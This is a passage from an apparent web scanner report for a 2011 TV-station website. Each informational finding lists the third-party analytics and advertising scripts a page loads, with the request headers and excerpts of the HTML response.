Path:	/sections/abouthdtv/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=custsvc&ghier=custsvc&us=anonymous
http://edge.quantserve.com/quant.js

Request

GET /sections/abouthdtv/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:20:51 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:30:51 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 23551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=custsvc&ghier=custsvc&us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.787. http://www.cbs6albany.com/sections/articles-map/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/articles-map/

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=news&ghier=news&us=anonymous
http://edge.quantserve.com/quant.js

Request

GET /sections/articles-map/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:21:50 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:31:50 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 22945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:og="
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=news&ghier=news&us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.788. http://www.cbs6albany.com/sections/contactus/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/contactus/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://b3.caspio.com/scripts/e1.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=custsvc&ghier=custsvc&us=anonymous
http://edge.quantserve.com/quant.js

Request

GET /sections/contactus/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:22:31 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:32:31 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=custsvc&ghier=custsvc&us=anonymous"></script>
...[SNIP]...
<div align="center" class="infocenter newstext">
<script type="text/javascript" src="http://b3.caspio.com/scripts/e1.js"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.789. http://www.cbs6albany.com/sections/contactus/newstips/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/contactus/newstips/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=custsvc&ghier=custsvc&us=anonymous
http://common.onset.freedom.com/js/zvents-mini-base.js
http://common.onset.freedom.com/js/zvents-mini-custom.js
http://edge.quantserve.com/quant.js

Request

GET /sections/contactus/newstips/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:23:02 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:33:02 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 44014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=custsvc&ghier=custsvc&us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.790. http://www.cbs6albany.com/sections/employmentopportunities/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/employmentopportunities/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=classified%7Cjobs&ghier=classified%7Cjobs&us=anonymous
http://edge.quantserve.com/quant.js

Request

GET /sections/employmentopportunities/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:26:50 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:36:50 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 23649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=classified%7Cjobs&ghier=classified%7Cjobs&us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.791. http://www.cbs6albany.com/sections/jobsonline/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/jobsonline/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=special&ghier=special&us=anonymous
http://common.onset.freedom.com/js/zvents-mini-base.js
http://common.onset.freedom.com/js/zvents-mini-custom.js
http://edge.quantserve.com/quant.js

Request

GET /sections/jobsonline/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:26:38 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:36:38 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=special&ghier=special&us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.792. http://www.cbs6albany.com/sections/live-cameras/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/live-cameras/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=traffic&ghier=traffic&us=anonymous
http://common.onset.freedom.com/js/zvents-mini-base.js
http://common.onset.freedom.com/js/zvents-mini-custom.js
http://edge.quantserve.com/quant.js

Request

GET /sections/live-cameras/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:19:58 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:29:58 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 43116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=traffic&ghier=traffic&us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.793. http://www.cbs6albany.com/sections/local-news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/local-news/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=Local News&ghier=news%7Clocal&us=anonymous
http://common.onset.freedom.com/js/zvents-mini-base.js
http://common.onset.freedom.com/js/zvents-mini-custom.js
http://edge.quantserve.com/quant.js

Request

GET /sections/local-news/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:18:46 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:28:46 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 87750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=Local News&ghier=news%7Clocal&us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.794. http://www.cbs6albany.com/sections/local-sports/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/local-sports/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://b3.caspio.com/scripts/e1.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=Local Sports&ghier=sports&us=anonymous
http://common.onset.freedom.com/js/zvents-mini-base.js
http://common.onset.freedom.com/js/zvents-mini-custom.js
http://edge.quantserve.com/quant.js

Request

GET /sections/local-sports/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:19:04 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:29:04 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 74279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=Local Sports&ghier=sports&us=anonymous"></script>
...[SNIP]...
<div class="caspio">
<script type="text/javascript"
src="http://b3.caspio.com/scripts/e1.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.795. http://www.cbs6albany.com/sections/production-department/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/production-department/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=custsvc%7Ccontact&ghier=custsvc%7Ccontact&us=anonymous
http://common.onset.freedom.com/js/zvents-mini-base.js
http://common.onset.freedom.com/js/zvents-mini-custom.js
http://edge.quantserve.com/quant.js

Request

GET /sections/production-department/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:24:46 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:34:46 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=custsvc%7Ccontact&ghier=custsvc%7Ccontact&us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.796. http://www.cbs6albany.com/sections/publicfile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/publicfile/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=special&ghier=special&us=anonymous
http://common.onset.freedom.com/js/zvents-mini-base.js
http://common.onset.freedom.com/js/zvents-mini-custom.js
http://edge.quantserve.com/quant.js

Request

GET /sections/publicfile/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:26:02 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:36:02 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=special&ghier=special&us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.797. http://www.cbs6albany.com/sections/rss/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/rss/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=media%7Crss&ghier=media%7Crss&us=anonymous
http://common.onset.freedom.com/js/zvents-mini-base.js
http://common.onset.freedom.com/js/zvents-mini-custom.js
http://edge.quantserve.com/quant.js

Request

GET /sections/rss/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:18:30 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:28:30 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 59348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=media%7Crss&ghier=media%7Crss&us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.798. http://www.cbs6albany.com/sections/sales/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/sales/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://b3.caspio.com/scripts/e1.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
